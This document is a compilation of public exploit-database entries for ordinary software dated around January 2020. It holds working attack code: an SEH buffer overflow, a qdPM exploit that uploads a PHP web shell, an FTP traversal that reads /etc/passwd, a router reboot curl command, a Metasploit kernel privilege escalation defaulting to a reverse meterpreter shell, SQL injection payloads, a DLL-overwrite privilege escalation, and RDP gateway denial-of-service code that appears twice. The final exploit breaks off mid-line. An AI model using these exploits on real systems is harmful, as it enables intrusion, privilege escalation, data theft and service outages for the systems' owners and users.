# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC) # Exploit Author: boku # Date: 2020-01-22 # Software Vendor: Wierd Solutions # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe # Version: BOOTP Turbo (x86) Version 2.0 # Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC # Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit # Replicate Crash: # 1) Download, Install, and Open BootP Turbo v2.0 for windows x86 # 2) Go to Edit > Settings > Click the Detailed Logging Box # 3) Run python script, open created file 'crash.txt' # 4) Select-All > Copy All, from file # 5) Paste buffer in the 'Log File' text-box, Click 'OK' # 6) Close the 'Control Service' Pop-Up Window # 7) Crash with SEH Overwrite # SEH chain of main thread # Address SE handler # 019CD254 43434343 # 42424242 *** CORRUPT ENTRY *** # Loaded Application Modules # Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path # True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll) # True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll) # True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll) # True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe) # True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll) #!/usr/bin/python offset = '\x41'*2196 nSEH = '\x42\x42\x42\x42' SEH = '\x43\x43\x43\x43' filler = '\x44'*(3000-len(offset+nSEH+SEH)) payload = offset+nSEH+SEH+filler try: f=open("crash.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: qdPM 9.1 - Remote Code Execution # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2020-01-22 # Exploit Author: Rishal Dwivedi (Loginsoft) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Windows 10 (Python 2.7) # CVE : CVE-2020-7246 # Exploit written in Python 2.7 # Tested Environment - Windows 10 # Path Traversal + Remote Code Execution # Command - qdpm-exploit.py -url http://localhost/ -u [email protected] -p password # -*- coding: utf-8 -*- #!/usr/bin/python import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm( userid, username, csrftoken_, EMAIL, HOSTNAME, uservar, ): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req( userid, username, csrftoken_, EMAIL, HOSTNAME, ): request_1 = multifrm( userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess', ) new = session_requests.post(HOSTNAME + 'index.php/myAccount/update' , files=request_1) request_2 = multifrm( userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess', ) new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update' , files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>' , 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): result = session_requests.get(HOSTNAME + '/index.php/login') login_tree = html.fromstring(result.text) authenticity_token = \ list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value" )))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) account_page = session_requests.get(HOSTNAME + 'index.php/myAccount' ) account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = \ account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = \ final_tree.xpath("//input[@name='users[photo_preview]']/@value") print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \ + backdoor[-1] + '?cmd=whoami' if __name__ == '__main__': parser = \ ArgumentParser(description='qdmp - Path traversal + RCE Exploit' ) parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() main(args.hostname, args.email, args.password)

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal # Date: 2020-01-23 # Vulnerability: Path Traversal # Exploit Author: 1F98D # Vendor Homepage: https://github.com/pachev/pachev_ftp from ftplib import FTP ip = raw_input("Target IP: ") port = int(raw_input("Target Port: ")) ftp = FTP() ftp.connect(host=ip, port=port) ftp.login('pachev', '') ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write) ftp.close() file = open('passwd.txt', 'r') print "[**] Printing the contents of /etc/passwd\n" print file.read()

# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot # Date: 2020-01-20 # Exploit Author: PCEumel # Vendor Homepage: https://www.tp-link.com/ # Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware # Version: TP-Link TP-SG105E V4 # Tested on: TP-SG105E V4 1.0.0 Build 20181120 # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip # CVE : CVE-2019-16893 # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch". # It features a web front end and an application (Easy Smart Configuration Utility) # for easy configuration management. # The device does not properly restrict access to an internal API. # It is therefore possible to remotely reboot the device by sending a HTTP POST # request. --- # POC : curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi --- Timeline : 2019-09-16 | Vendor notified 2019-09-25 | Reply (they will patch it) 2019-12-24 | First patch for testing 2019-12-19 | Confirmed the functionality of the patch 2020-01-14 | Public patch available

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Compile include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on Linux systems by abusing a NULL pointer dereference in the `rds_atomic_free_op` function in the Reliable Datagram Sockets (RDS) kernel module (rds.ko). Successful exploitation requires the RDS kernel module to be loaded. If the RDS module is not blacklisted (default); then it will be loaded automatically. This exploit supports 64-bit Ubuntu Linux systems, including distributions based on Ubuntu, such as Linux Mint and Zorin OS. Target offsets are available for: Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic. This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on various 4.4 and 4.8 kernels. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333) 'Jann Horn', # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213) 'wbowling', # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic 'bcoles', # Metasploit module and updated C exploit 'nstarke' # Additional kernel offsets ], 'DisclosureDate' => '2018-11-01', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'CVE', '2018-5333' ], [ 'CVE', '2019-9213' ], [ 'BID', '102510' ], [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ], [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ], [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ], [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ], [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ], [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ], [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_OS_DOWN ], }, 'DefaultTarget' => 0)) register_advanced_options [ OptBool.new('ForceExploit', [ false, 'Override check result', false ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def base_dir datastore['WritableDir'].to_s end def check arch = kernel_hardware unless arch.include? 'x86_64' return CheckCode::Safe("System architecture #{arch} is not supported") end vprint_good "System architecture #{arch} is supported" offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first kernels = offsets.scan(/"(.+?)"/).flatten version = "#{kernel_release} #{kernel_version.split(' ').first}" unless kernels.include? version return CheckCode::Safe("Linux kernel #{version} is not vulnerable") end vprint_good "Linux kernel #{version} is vulnerable" if smap_enabled? return CheckCode::Safe('SMAP is enabled') end vprint_good 'SMAP is not enabled' if lkrg_installed? return CheckCode::Safe('LKRG is installed') end vprint_good 'LKRG is not installed' if grsec_installed? return CheckCode::Safe('grsecurity is in use') end vprint_good 'grsecurity is not in use' unless kernel_modules.include? 'rds' vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation' return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation') end vprint_good 'rds.ko kernel module is loaded' CheckCode::Appears end def exploit unless [CheckCode::Detected, CheckCode::Appears].include? check unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out') end register_file_for_cleanup exploit_path payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" upload_and_chmodx payload_path, generate_payload_exe register_file_for_cleanup payload_path # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete timeout = 30 print_status "Launching exploit (timeout: #{timeout})..." output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout) output.each_line { |line| vprint_status line.chomp } end end

# Exploit Title: Webtareas 2.0 - 'id' SQL Injection # Date: 2020-01-23 # Exploit Author: Greg.Priest # Vendor Homepage: http://webtareas.sourceforge.net/general/home.php # Software Link: http://webtareas.sourceforge.net/general/home.php # Version: Webtareas v2.0 # Tested on: Windows # CVE : N/A Webtareas v2.0 authenticated Sql injection 0day Vulnerable Request: POST /webtareas/includes/general_serv.php HTTP/1.1 Host: 10.61.57.147 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 98 Origin: http://10.61.57.147 Connection: close Referer: http://10.61.57.147/webtareas/general/home.php? Cookie: webTareasSID=npmmte1hejtnsi35mcqbc97gse action=cardview-actions&prefix=..%2F&object=projects&tblnam=projects&extra=&extpath=&id=1[Vulnerable parameter!]&defact=Y -------------------------------------------------------------------------------------------------------------------------- C:\Users\--------\Desktop\sqlmap>sqlmap.py -r webt01 ___ __H__ ___ ___[,]_____ ___ ___ {1.4.1.17#dev} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:09:44 /2020-01-23/ [12:09:44] [INFO] parsing HTTP request from 'webt01' [12:09:45] [WARNING] provided value for parameter 'extra' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [12:09:45] [WARNING] provided value for parameter 'extpath' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [12:09:45] [INFO] resuming back-end DBMS 'mysql' [12:09:45] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND 4597=4597 AND 'yvIt'='yvIt&defact=Y Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND (SELECT 4838 FROM (SELECT(SLEEP(5)))WYXW) AND 'lBki'='lBki&defact=Y --- [12:09:45] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.13 back-end DBMS: MySQL >= 5.0.12 [12:09:45] [INFO] fetched data logged to text files under 'C:\Users\--------\AppData\Local\sqlmap\output\10.61.57.147' [*] ending @ 12:09:45 /2020-01-23/ https://github.com/Gr3gPr1est/BugReport/blob/master/WebTareas2.0_Authenticated_SQLinjection_0day.pdf

# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery # Google Dork: intext:"TopManage ® 2002 - 2020" # Date: 2020-01-13 # Exploit Author: Joel Aviad Ossi # Vendor Homepage: http://www.topmanage.com/ # Software Link: http://www.topmanage.com/microsites/olk-web-store/ # Version: 2020 # Tested on: N/A # CVE : N/A # Reference: https://websec.nl/news.php POST /olk/client/login.asp HTTP/1.1 Host: examplesite.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 88 Origin: https://examplesite.com Connection: close Referer: https://examplesite.com/olk/client/login.asp?se=Y Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH Upgrade-Insecure-Requests: 1 dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=

# Exploit Title: Genexis Platinum-4410 2.1 - Authentication Bypass # Date: 20220-01-08 # Exploit Author: Husinul Sanub # Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/ # Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Router https://genexis.co.in/product/ont/ # Firmware version: P4410-V2–1.28 # Vendor Homepage: https://genexis.co.in/ # Reference: https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206 # CVE: CVE-2020-6170 Vulnerability Details ====================== Genexis Platinum-4410 v2.1 Home Gateway Router discloses passwords of each users(Admin,GENEXIS,user3) in plain text behind login page source “http://192.168.1.1/cgi-bin/index2.asp". This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, changing passwords, upload malicious firmware etc. How to reproduce =================== Suppose 192.168.1.1 is the router IP and check view page source of login page “http://192.168.1.1/cgi-bin/index2.asp",There we can found passwords for each login accounts in clear text. POC ========= * https://youtu.be/IO_Ez4XH-0Y

/* This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded (CVE-2019-19363). Written by Pentagrid AG, 2019. Cf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/ Credits: Alexander Pudwill This proof of concept code is based on the ReadDirectoryChangesW API call to get notified about changes on files and directories and reuses parts from the example from https://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html */ #include <stdio.h> #include <stdlib.h> #include <conio.h> #include <windows.h> #define MAX_BUFFER 4096 int change_counter = 0; const WCHAR * const BaseDirName = L"C:\\ProgramData"; const WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName; DWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE | FILE_NOTIFY_CHANGE_SIZE | FILE_NOTIFY_CHANGE_LAST_ACCESS | FILE_NOTIFY_CHANGE_CREATION; typedef struct _DIRECTORY_INFO { HANDLE hDir; TCHAR lpszDirName[MAX_PATH]; CHAR lpBuffer[MAX_BUFFER]; DWORD dwBufLength; OVERLAPPED Overlapped; } DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO; DIRECTORY_INFO DirInfo; void WINAPI HandleDirectoryChange(DWORD dwCompletionPort) { DWORD numBytes, cbOffset; LPDIRECTORY_INFO di; LPOVERLAPPED lpOverlapped; PFILE_NOTIFY_INFORMATION fni; WCHAR FileName[MAX_PATH]; do { GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE); if (di) { fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer; do { cbOffset = fni->NextEntryOffset; // get filename size_t num_elem = fni->FileNameLength / sizeof(WCHAR); if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0; wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem); FileName[num_elem] = '\0'; wprintf(L"+ Event for %s [%d]\n", FileName, change_counter); if (fni->Action == FILE_ACTION_MODIFIED) { if (!wcscmp(FileName, TargetDLLRelFilePath)) { if (change_counter > 0) change_counter--; if (change_counter == 0) { change_counter--; if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE)) wprintf(L"+ File %s copied to %s.\n", MaliciousLibraryFile, TargetDllFullFilePath); else { wchar_t buf[256]; FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), buf, (sizeof(buf) / sizeof(wchar_t)), NULL); wprintf(L"+ Failed to copy file %s to %s: %s\n", MaliciousLibraryFile, TargetDllFullFilePath, buf); } exit(1); } // end of trigger part } } // eo action mod fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset); } while (cbOffset); // Reissue the watch command ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL); } } while (di); } void WINAPI InstallPrinter() { WCHAR cmd_buf[1000]; swprintf(cmd_buf, sizeof(cmd_buf), L"/c rundll32 printui.dll, PrintUIEntry /if /b \"Printer\" /r lpt1: /m \"%s\"", PrinterName); wprintf(L"+ Adding printer: %s\n", cmd_buf); unsigned long ret = (unsigned long) ShellExecuteW(0, L"open", L"cmd", cmd_buf, NULL, SW_HIDE); if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value. wprintf(L"+ Failed launching command. Return value is %d\n", ret); } void WINAPI WatchDirectories(HANDLE hCompPort) { DWORD tid; HANDLE hThread; ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL); // Create a thread to sit on the directory changes hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid); // Just loop and wait for the user to quit InstallPrinter(); while (_getch() != 'q'); // The user has quit - clean up PostQueuedCompletionStatus(hCompPort, 0, 0, NULL); // Wait for the Directory thread to finish before exiting WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); } int wmain(int argc, WCHAR *argv[]) { HANDLE hCompPort = NULL; // Handle To a Completion Port if (argc == 6) { PrinterName = argv[1]; TargetDllFullFilePath = argv[2]; TargetDLLRelFilePath = argv[3]; MaliciousLibraryFile = argv[4]; change_counter = _wtoi(argv[5]); } else { wprintf(L"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\n", argv[0]); return 0; } wprintf(L"+ Monitoring directory %s\n", BaseDirName); // Get a handle to the directory DirInfo.hDir = CreateFile(BaseDirName, FILE_LIST_DIRECTORY, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED, NULL); if (DirInfo.hDir == INVALID_HANDLE_VALUE) { wprintf(L"Unable to open directory %s. GLE=%ld. Terminating...\n", BaseDirName, GetLastError()); return 0; } lstrcpy(DirInfo.lpszDirName, BaseDirName); if (HANDLE hFile = CreateFile(TargetDllFullFilePath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) { wprintf(L"+ File %s created\n", TargetDllFullFilePath); CloseHandle(hFile); } else wprintf(L"+ File %s could not be created\n", TargetDllFullFilePath); if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) { wprintf(L"+ CreateIoCompletionPort() failed.\n"); return 0; } wprintf(L"+ Press <q> to exit\n"); // Start watching WatchDirectories(hCompPort); CloseHandle(DirInfo.hDir); CloseHandle(hCompPort); return 1; }

#include "BlueGate.h" /* EDB Note: - Download (Binary) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-1.exe - Download (Source) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-2.zip */ void error(const char* msg) { printf("ERROR: %s\n", msg); exit(EXIT_FAILURE); } void SOCKInit() { WSADATA wsaData; int res; res = WSAStartup(MAKEWORD(2, 2), &wsaData); if (res != 0) error("WSAStartup failed"); } void DTLSInit() { SSL_library_init(); SSL_load_error_strings(); ERR_load_BIO_strings(); OpenSSL_add_all_algorithms(); } int OpenUDPConnection(const char* hostname, int port) { int sockfd; sockaddr_in addr; sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) error("Failed to open socket"); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, hostname, &(addr.sin_addr)); if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0) { closesocket(sockfd); error("Failed to connect socket"); } return sockfd; } SSL* DTLSConnection(const char* hostname) { int sockfd; int result; DTLSParams client; sockfd = OpenUDPConnection(hostname, 3391); client.ctx = SSL_CTX_new(DTLS_client_method()); client.bio = BIO_new_ssl_connect(client.ctx); BIO_set_conn_hostname(client.bio, hostname); BIO_get_ssl(client.bio, &(client.ssl)); SSL_set_connect_state(client.ssl); SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY); SSL_set_fd(client.ssl, sockfd); if (SSL_connect(client.ssl) != 1) { return NULL; } return client.ssl; } int send_dos_packet(SSL* ssl, int id) { CONNECT_PKT_FRAGMENT packet; packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT; packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER); packet.usFragmentID = id; packet.usNoOfFragments = id; packet.cbFragmentLength = 1000; memset(packet.fragment, 0x41, 1000); char pkt[sizeof(packet)]; memcpy(&pkt, &packet, sizeof(packet)); return SSL_write(ssl, pkt, sizeof(pkt)); } int main(int argc, char* argv[]) { SSL* ssl; int i = 0; char* hostname; if (argc != 2) { printf("Usage: %s <IP address>\n", argv[0]); return 0; } hostname = argv[1]; SOCKInit(); DTLSInit(); while (i++ > -1) { ssl = DTLSConnection(hostname); if (ssl == NULL) { break; } for (int n = 0; n < 4; n++) { send_dos_packet(ssl, i+n); printf("Sending packet [%u]\n", i + n); } i++; } return 0; }

#include "BlueGate.h" /* EDB Note: - Download (Source) ~ - Download (Binary) ~ */ void error(const char* msg) { printf("ERROR: %s\n", msg); exit(EXIT_FAILURE); } void SOCKInit() { WSADATA wsaData; int res; res = WSAStartup(MAKEWORD(2, 2), &wsaData); if (res != 0) error("WSAStartup failed"); } void DTLSInit() { SSL_library_init(); SSL_load_error_strings(); ERR_load_BIO_strings(); OpenSSL_add_all_algorithms(); } int OpenUDPConnection(const char* hostname, int port) { int sockfd; sockaddr_in addr; sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) error("Failed to open socket"); addr.sin_family = AF_INET; addr.sin_port = htons(port); inet_pton(AF_INET, hostname, &(addr.sin_addr)); if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0) { closesocket(sockfd); error("Failed to connect socket"); } return sockfd; } SSL* DTLSConnection(const char* hostname) { int sockfd; int result; DTLSParams client; sockfd = OpenUDPConnection(hostname, 3391); client.ctx = SSL_CTX_new(DTLS_client_method()); client.bio = BIO_new_ssl_connect(client.ctx); BIO_set_conn_hostname(client.bio, hostname); BIO_get_ssl(client.bio, &(client.ssl)); SSL_set_connect_state(client.ssl); SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY); SSL_set_fd(client.ssl, sockfd); if (SSL_connect(client.ssl) != 1) { return NULL; } return client.ssl; } int send_dos_packet(SSL* ssl, int id) { CONNECT_PKT_FRAGMENT packet; packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT; packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER); packet.usFragmentID = id; packet.usNoOfFragments = id; packet.cbFragmentLength = 1000; memset(packet.fragment, 0x41, 1000); char pkt[sizeof(packet)]; memcpy(&pkt, &packet, sizeof(packet)); return SSL_write(ssl, pkt, sizeof(pkt)); } int main(int argc, char* argv[]) { SSL* ssl; int i = 0; char* hostname; if (argc != 2) { printf("Usage: %s <IP address>\n", argv[0]); return 0; } hostname = argv[1]; SOCKInit(); DTLSInit(); while (i++ > -1) { ssl = DTLSConnection(hostname); if (ssl == NULL) { break; } for (int n = 0; n < 4; n++) { send_dos_packet(ssl, i+n); printf("Sending packet [%u]\n", i + n); } i++; } return 0; }

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH) # Exploit Author: boku # Date: 2020-01-24 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe # Version: Torrent 3GP Converter Version 1.51 Build 116 # Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: # 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86 # 2) run python script & open created 'crash.txt' file # 3) select-all > copy-all # 4) in app, click 'Register' on the bottom # 5) in 'Name:' textbox enter 'a' # 6) in 'Code:' textbox paste buffer # 7) click 'OK', calculator will open & app will crash #!/usr/bin/python # Bad Chars # \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer # \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper # \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper # \x9a => \x8a # \x9c => \x8c # \x9e => \x8e # \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6 # \xf8-\xfe => \xd8-\xde # \xff => \x9f # badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' # Max shellcode size is 2384 bytes # - First 2384 bytes of our buffer is left unmangled on the stack # msfvenom 